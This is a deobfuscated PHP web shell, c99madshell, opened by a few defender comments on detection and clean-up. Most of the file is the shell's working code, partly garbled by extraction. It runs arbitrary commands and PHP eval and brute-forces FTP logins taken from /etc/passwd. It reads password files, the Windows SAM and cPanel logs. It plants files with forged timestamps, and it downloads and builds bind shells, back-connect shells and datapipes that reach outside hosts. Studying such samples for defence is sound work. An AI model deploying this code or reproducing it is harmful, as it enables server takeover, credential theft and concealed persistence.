/* Decoded by unphp.net */
/*
 * Defender reference: this is the bootstrap of a PHP web shell that identifies
 * itself as "c99madshell" (see $accessdeniedmess and $shver below). The listing
 * is deobfuscator output and is incomplete; the notes describe only what the
 * visible statements do, for detection and clean-up purposes.
 */
/*
 * getmicrotime(): returns the current time as float seconds by adding the two
 * space-separated fields of microtime(). It stamps the `starttime` constant
 * below and is reused later in the listing to time operations and to print
 * the "Generation time" footer.
 */
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
/*
 * Runtime setup: error_reporting(5) leaves only E_ERROR|E_PARSE enabled;
 * ignore_user_abort(TRUE) keeps the request running after the client
 * disconnects; $win records whether PHP_OS starts with "win".
 * NOTE(review): set_magic_quotes_runtime() and get_magic_quotes_gpc() are
 * legacy APIs that were removed from later PHP releases, which suggests the
 * code targets old PHP installations - confirm against the host's version.
 */
error_reporting(5); @ignore_user_abort(TRUE); @set_magic_quotes_runtime(0); $win = strtolower(substr(PHP_OS,0,3)) == "win"; define("starttime",getmicrotime());
/*
 * When magic quotes are enabled, strips() walks $GLOBALS recursively (skipping
 * the self-referencing "GLOBALS" key) and applies stripslashes() to every
 * non-array value, undoing the automatic escaping of request data.
 */
if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
/*
 * Detection-relevant: $_REQUEST is rebuilt from cookies and POST fields only
 * (POST wins on key clashes), then every entry is copied into a global
 * variable of the same name unless that variable is already set. The values
 * the page later branches on ($act, $d, $cmd, $eval, ...) can arrive this way,
 * so the request line / query string in an access log will not show them.
 * Triage therefore needs POST-body or cookie capture (WAF, reverse proxy or
 * audit logging), not just the access log.
 */
$_REQUEST = array_merge($_COOKIE,$_POST); foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
/*
 * Configuration block. Static indicators for scanning a web root: the
 * self-identification string "c99madshell v." combined with $shver, and the
 * remote URL assigned to $c99sh_sourcesurl.
 *
 * $filestealth: elsewhere in this listing, file writes guarded by this flag
 * call stat() first and afterwards touch() the file back to its previous
 * mtime/atime. Modification time alone is therefore not a reliable sign of
 * tampering; compare content hashes, or the inode change time (ctime) on
 * POSIX filesystems, which touch() does not restore.
 *
 * $surl defaults to PHP_SELF when the request did not supply it and is then
 * HTML-escaped. $timelimit, $host_allow, $login_txt and $gzipencode are only
 * assigned here; their use is not visible in this listing (presumably
 * access-control and output options - confirm against a complete sample).
 *
 * The $donated_html string literal opened at the end of this line continues
 * on the following line; its content was damaged during extraction.
 */
$shver = "1.0 shadow edition"; if (empty($surl)) { $surl = $_SERVER['PHP_SELF']; } $surl = htmlspecialchars($surl); $timelimit = 0; $host_allow = array("*"); $login_txt = "Admin area"; $accessdeniedmess = "c99madshell v.".$shver.": access denied"; $gzipencode = TRUE; $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; $filestealth = TRUE; $donated_html = "
"; if ($tbl_struct) { echo " | Fields: "; foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "> ".$name." ";} echo " |
Software: {$DISP_SERVER_SOFTWARE} uname -a: " . wordwrap(php_uname(),90," "; if (!$win) {echo wordwrap(myshellexec("id"),90," Safe-mode: {$hsafemode} "; $d = str_replace("\",DIRECTORY_SEPARATOR,$d); if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} $d = str_replace("\",DIRECTORY_SEPARATOR,$d); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $d = str_replace("\","\",$d); $dispd = htmlspecialchars($d); $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); $i = 0; foreach($pd as $b) { $t = ""; $j = 0; foreach ($e as $r) { $t.= $r.DIRECTORY_SEPARATOR; if ($j == $i) {break;} $j++; } echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; $i++; } echo " "; if (is_writable($d)) { $wd = TRUE; $wdt = "[ ok ]"; echo "".view_perms(fileperms($d)).""; } else { $wd = FALSE; $wdt = "[ Read-Only ]"; echo "".view_perms_color($d).""; } if (is_callable("disk_free_space")) { $free = disk_free_space($d); $total = disk_total_space($d); if ($free === FALSE) {$free = 0;} if ($total === FALSE) {$total = 0;} if ($free < 0) {$free = 0;} if ($total < 0) {$total = 0;} $used = $total-$free; $free_percent = round(100/($total/$free),2); echo " |
".$donated_html." |
"; if ($act == "") {$act = $dspact = "ls";} if ($act == "sql") { echo(""); if (isset($_POST['sql_login'])) {$sql_login=htmlspecialchars($_POST['sql_login']);} if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);} if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);} if (isset($_POST['sql_port'])) {$sql_port=htmlspecialchars($_POST['sql_port']);} if (isset($_POST['sql_db'])) {$sql_db=htmlspecialchars($_POST['sql_db']);} if (isset($_POST['sql_act'])) {$sql_act=htmlspecialchars($_POST['sql_act']);} if (isset($_POST['sql_tbl'])) {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);} if (isset($_POST['sql_tbl_act'])) {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);} if (isset($_POST['thistbl'])) {$thistbl=htmlspecialchars($_POST['thistbl']);} if (isset($_POST['sql_order'])) {$sql_order=htmlspecialchars($_POST['sql_order']);} if (isset($_POST['sql_tbl_ls'])) {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);} if (isset($_POST['sql_tbl_le'])) {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);} if (isset($_POST['sql_query'])) {$sql_query=htmlspecialchars($_POST['sql_query']);} if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));} if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);} if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);} echo"
"; } $act = $dspact = "ls"; } if ($act == "ftpquickbrute") { echo "Ftp Quick brute: "; if (!win) {echo "This functions not work in Windows! ";} else { function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} else {$TRUE = TRUE;} if ($TRUE) { $sock = @ftp_connect($host,$port,$timeout); if (@ftp_login($sock,$login,$pass)) { echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\". "; ob_flush(); return TRUE; } } } if (!empty($submit)) { if (isset($_POST['fqb_lenght'])) $fqb_lenght = $_POST['fqb_lenght']; if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} $fp = fopen("/etc/passwd","r"); if (!$fp) {echo "Can't get /etc/passwd for password-list.";} else { if (isset($_POST['fqb_logging'])) $fqb_logging = $_POST['fqb_logging']; if ($fqb_logging) { if (isset($_POST['fqb_logfile'])) $fqb_logging = $_POST['fqb_logfile']; if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} else {$fqb_logfp = FALSE;} $fqb_log = "FTP Quick Brute (called c99madshell v. ".$shver.") started at ".date("d.m.Y H:i:s")." "; if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} } ob_flush(); $i = $success = 0; $ftpquick_st = getmicrotime(); while(!feof($fp)) { $str = explode(":",fgets($fp,2048)); if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\" "; $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")." "; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} $success++; ob_flush(); } if ($i > $fqb_lenght) {break;} $i++; } if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections! ";} $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); echo " Done! 
Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; $fqb_log .= " ------------------------------------------ Done! Total time (secs.): ".$ftpquick_t." Total connections: ".$i." Success.: ".$success." Unsuccess.:".($i-$success)." Connects per second: ".round($i/$ftpquick_t,2)." "; if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} fclose($fqb_logfp); } } else { $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); echo ""; } } } if ($act == "d") { if (!is_dir($d)) {echo "
"; } } if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} if ($act == "security") { echo " "; if (!$win) { if ($nixpasswd) { if ($nixpasswd == 1) {$nixpasswd = 0;} echo "*nix /etc/passwd: "; if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} echo " "; $i = $nixpwd_s; while ($i < $nixpwd_e) { $uid = posix_getpwuid($i); if ($uid) { $uid["dir"] = "".$uid["dir"].""; echo join(":",$uid)." "; } $i++; } } else {echo " Get /etc/passwd ";} } else { $v = $_SERVER["WINDIR"]." epair\sam"; if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.") ";} else {echo "You can crack winnt passwords. Download, and use lcp.crack+ c. ";} } if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs ";} if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs ";} if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf) ";} if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf) ";} if (file_get_contents("/etc/motd")) {echo "Message Of The Day ";} if (file_get_contents("/etc/hosts")) {echo "Hosts ";} function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)." 
";}} displaysecinfo("OS Version?",myshellexec("cat /proc/version")); displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); displaysecinfo("RAM",myshellexec("free -m")); displaysecinfo("HDD space",myshellexec("df -h")); displaysecinfo("List of Attributes",myshellexec("lsattr -a")); displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); displaysecinfo("Is cURL installed?",myshellexec("which curl")); displaysecinfo("Is lynx installed?",myshellexec("which lynx")); displaysecinfo("Is links installed?",myshellexec("which links")); displaysecinfo("Is fetch installed?",myshellexec("which fetch")); displaysecinfo("Is GET installed?",myshellexec("which GET")); displaysecinfo("Is perl installed?",myshellexec("which perl")); displaysecinfo("Where is apache",myshellexec("whereis apache")); displaysecinfo("Where is perl?",myshellexec("whereis perl")); displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); displaysecinfo("locate my.conf",myshellexec("locate my.conf")); displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); } if ($act == "mkfile") { if ($mkfile != $d) { if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} } else {$act = $dspact = "ls";} } if ($act == "fsbuff") { $arr_copy = $sess_data["copy"]; $arr_cut = $sess_data["cut"]; $arr = array_merge($arr_copy,$arr_cut); if (count($arr) == 0) {echo " "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} } if ($act == 
"selfremove") { if (($submit == $rndcode) and ($submit != "")) { if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99madshell v.".$shver."!"; c99shexit(); } else {echo " "; if (empty($search_in)) {$search_in = $d;} if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} if (empty($search_text_wwo)) {$search_text_regexp = 0;} if (!empty($submit)) { $found = array(); $found_d = 0; $found_f = 0; $search_i_f = 0; $search_i_d = 0; $a = array ( "name"=>$search_name, "name_regexp"=>$search_name_regexp, "text"=>$search_text, "text_regexp"=>$search_text_regxp, "text_wwo"=>$search_text_wwo, "text_cs"=>$search_text_cs, "text_not"=>$search_text_not ); $searchtime = getmicrotime(); $in = array_unique(explode(";",$search_in)); foreach($in as $v) {c99fsearch($v);} $searchtime = round(getmicrotime()-$searchtime,4); if (count($found) == 0) {echo "No files found!";} else { $ls_arr = $found; $disp_fullpath = TRUE; $act = "ls"; } } echo ""; if ($act == "ls") {$dspact = $act; echo " Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second). ";} } if ($act == "chmod") { $mode = fileperms($d.$f); if (!$mode) {echo "Change file-mode with error: can't get current value.";} else { $form = TRUE; if ($chmod_submit) { $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} else {$err = "Can't chmod to ".$octet.".";} } if ($form) { $perms = parse_perms($mode); echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." 
(".substr(decoct(fileperms($d.$f)),-4,4).") ".($err?"Error: ".$err:"").""; } } } if ($act == "upload") { $uploadmess = ""; $uploadpath = str_replace("\",DIRECTORY_SEPARATOR,$uploadpath); if (empty($uploadpath)) {$uploadpath = $d;} elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} if (!empty($submit)) { global $HTTP_POST_FILES; $uploadfile = $HTTP_POST_FILES["uploadfile"]; if (!empty($uploadfile["tmp_name"])) { if (empty($uploadfilename)) {$destin = $uploadfile["name"];} else {$destin = $userfilename;} if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"! ";} } elseif (!empty($uploadurl)) { if (!empty($uploadfilename)) {$destin = $uploadfilename;} else { $destin = explode("/",$destin); $destin = $destin[count($destin)-1]; if (empty($destin)) { $i = 0; $b = ""; while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} } if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url! ";} else { $st = getmicrotime(); $content = @file_get_contents($uploadurl); $dt = round(getmicrotime()-$st,4); if (!$content) {$uploadmess .= "Can't download file! ";} else { if ($filestealth) {$stat = stat($uploadpath.$destin);} $fp = fopen($uploadpath.$destin,"w"); if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."! ";} else { fwrite($fp,$content,strlen($content)); fclose($fp); if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} } } } } } if ($miniform) { echo "".$uploadmess.""; $act = "ls"; } else { echo "File upload: ".$uploadmess.""; } } if ($act == "delete") { $delerr = ""; foreach ($actbox as $v) { $result = FALSE; $result = fs_rmobj($v); if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)." 
";} } if (!empty($delerr)) {echo "Deleting with errors: ".$delerr;} $act = "ls"; } if (!$usefsbuff) { if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo " ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."! ";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } elseif ($actarcbuff) { $arcerr = ""; if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} else {$ext = ".tar.gz";} if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} $cmdline .= " ".$actarcbuff_path; $objects = array_merge($sess_data["copy"],$sess_data["cut"]); foreach($objects as $v) { $v = str_replace("\",DIRECTORY_SEPARATOR,$v); if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} if (is_dir($v)) { if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} $v .= "*"; } $cmdline .= " ".$v; } $tmp = realpath("."); chdir($d); $ret = myshellexec($cmdline); chdir($tmp); if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")! ";} $ret = str_replace(" "," ",$ret); $ret = explode(" ",$ret); if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} foreach($sess_data["cut"] as $k=>$v) { if (in_array($v,$ret)) {fs_rmobj($v);} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($arcerr)) {echo "Archivation errors: ".$arcerr;} $act = "ls"; } elseif ($actpastebuff) { $psterr = ""; foreach($sess_data["copy"] as $k=>$v) { $to = $d.basename($v); if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."! ";} if ($copy_unset) {unset($sess_data["copy"][$k]);} } foreach($sess_data["cut"] as $k=>$v) { $to = $d.basename($v); if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."! 
";} unset($sess_data["cut"][$k]); } c99_sess_put($sess_data); if (!empty($psterr)) {echo "Pasting with errors: ".$psterr;} $act = "ls"; } } if ($act == "cmd") { if (trim($cmd) == "ps -aux") {$act = "processes";} elseif (trim($cmd) == "tasklist") {$act = "processes";} else { @chdir($chdir); if (!empty($submit)) { echo "Result of execution this command: "; $olddir = realpath("."); @chdir($d); $ret = myshellexec($cmd); $ret = convert_cyr_string($ret,"d","w"); if ($cmd_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} @chdir($olddir); } else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} echo ""; } } if ($act == "ls") { if (count($ls_arr) > 0) {$list = $ls_arr;} else { $list = array(); if ($h = @opendir($d)) { while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} closedir($h); } else {} } if (count($list) == 0) {echo " "; if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) { echo " "; } echo " "; echo ""; } } if ($act == "tools") { $bndportsrcs = array( "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), "c99sh_bindport.c"=>array("Using C","%path %port %pass") ); $bcsrcs = array( "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), "c99sh_backconn.c"=>array("Using C","%path %host %port") ); $dpsrcs = array( "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") ); if (!is_array($bind)) {$bind = array();} if (!is_array($bc)) {$bc = array();} if (!is_array($datapipe)) {$datapipe = array();} if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} if 
(!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} if (!empty($bindsubmit)) { echo "Result of binding port:"; $v = $bndportsrcs[$bind["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $w = explode(".",$bind["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%port",$bind["port"],$v[1]); $v[1] = str_replace("%pass",$bind["pass"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); sleep(5); $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } if (!empty($bcsubmit)) { echo "Result of back connection: "; $v = $bcsrcs[$bc["src"]]; if (empty($v)) {echo "Unknown file! ";} else { $w = explode(".",$bc["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! 
";} elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%host",$bc["host"],$v[1]); $v[1] = str_replace("%port",$bc["port"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." > /dev/null &"); echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."... "; } } } if (!empty($dpsubmit)) { echo "Result of datapipe-running: "; $v = $dpsrcs[$datapipe["src"]]; if (empty($v)) {echo "Unknown file! ";} elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other! ";} else { $srcpath = $tmpdir.$datapipe["src"]; $w = explode(".",$datapipe["src"]); $ext = $w[count($w)-1]; unset($w[count($w)-1]); $srcpath = join(".",$w).".".rand(0,999).".".$ext; $binpath = $tmpdir.join(".",$w).rand(0,999); if ($ext == "pl") {$binpath = $srcpath;} @unlink($srcpath); $fp = fopen($srcpath,"ab+"); if (!$fp) {echo "Can't write sources to \"".$srcpath."\"! ";} elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} else { fwrite($fp,$data,strlen($data)); fclose($fp); if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); $v[1] = str_replace("%path",$binpath,$v[1]); $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); $v[1] = str_replace("//","/",$v[1]); $retbind = myshellexec($v[1]." 
> /dev/null &"); sleep(5); $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"! "; } } echo"Binding port: Back connection: Click \"Connect\" only after open port for it. You should use NetCat©, run \"nc -l -n -v -p {$bc_port}\"! Datapipe: Note: sources will be downloaded from remote server."; } if ($act == "processes") { echo "Processes: "; if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} else {$handler = "tasklist";} $ret = myshellexec($handler); if (!$ret) {echo "Can't execute \"".$handler."\"!";} else { if (empty($processes_sort)) {$processes_sort = $sort_default;} $parsesort = parsesort($processes_sort); if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} $k = $parsesort[0]; if ($parsesort[1] != "a") {$y = "!";} else {$y = "!";} $ret = htmlspecialchars($ret); if (!$win) { if ($pid) { if (is_null($sig)) {$sig = 9;} echo "Sending signal ".$sig." to #".$pid."... "; if (posix_kill($pid,$sig)) {echo "OK.";} else {echo "ERROR.";} } while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} $stack = explode(" ",$ret); $head = explode(" ",$stack[0]); unset($stack[0]); for($i=0;$i
"; $tmp = ob_get_contents(); $olddir = realpath("."); @chdir($d); if ($tmp) { ob_clean(); eval($eval); $ret = ob_get_contents(); $ret = convert_cyr_string($ret,"d","w"); ob_clean(); echo $tmp; if ($eval_txt) { $rows = count(explode(" ",$ret))+1; if ($rows < 10) {$rows = 10;} echo " "; } else {echo $ret." ";} } else { if ($eval_txt) { echo " "; } else {echo $ret;} } @chdir($olddir); } else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} echo ""; } if ($act == "f") { if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") { if (file_exists($d.$f)) {echo " Create Select action/file-type: "; foreach($arr as $t) { if ($t[1] == $rft) {echo " ".$t[0]."";} elseif ($t[1] == $ft) {echo " ".$t[0]."";} else {echo " ".$t[0]."";} echo " |"; } echo " "; if ($ft == "info") { echo "Information:
"; $fi = fopen($d.$f,"rb"); if ($fi) { if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} $n = 0; $a0 = "00000000 "; $a1 = ""; $a2 = ""; for ($i=0; $i "; $a2 .= " "; } } echo "
"; } $encoded = ""; if ($base64 == 1) { echo "Base64 Encode "; $encoded = base64_encode(file_get_contents($d.$f)); } elseif($base64 == 2) { echo "Base64 Encode + Chunk "; $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); } elseif($base64 == 3) { echo "Base64 Encode + Chunk + Quotes "; $encoded = base64_encode(file_get_contents($d.$f)); $encoded = substr(preg_replace("!.{1,76}!","' '. ",$encoded),0,-2); } elseif($base64 == 4) { $text = file_get_contents($d.$f); $encoded = base64_decode($text); echo "Base64 Decode"; if (base64_encode($encoded) != $text) {echo " (failed)";} echo " "; } if (!empty($encoded)) { echo " "; } echo "HEXDUMP: Base64: "; } elseif ($ft == "html") { if ($white) {@ob_clean();} echo $r; if ($white) {c99shexit();} } elseif ($ft == "txt") {echo " ".htmlspecialchars($r)."";} elseif ($ft == "ini") {echo " "; var_dump(parse_ini_file($d.$f,TRUE)); echo "";} elseif ($ft == "phpsess") { echo " "; $v = explode("|",$r); echo $v[0].""; } elseif ($ft == "exe") { $ext = explode(".",$f); $c = count($ext)-1; $ext = $ext[$c]; $ext = strtolower($ext); $rft = ""; foreach($exeftypes as $k=>$v) { if (in_array($ext,$v)) {$rft = $k; break;} } $cmd = str_replace("%f%",$f,$rft); echo "Execute file:"; } elseif ($ft == "sdb") {echo " "; var_dump(unserialize(base64_decode($r))); echo "";} elseif ($ft == "code") { if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) { $arr = explode(" ",$r); if (count($arr == 18)) { include($d.$f); echo "phpBB configuration is detected in this file! "; if ($dbms == "mysql4") {$dbms = "mysql";} if ($dbms == "mysql") {echo "Connect to DB ";} else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99madshell. 
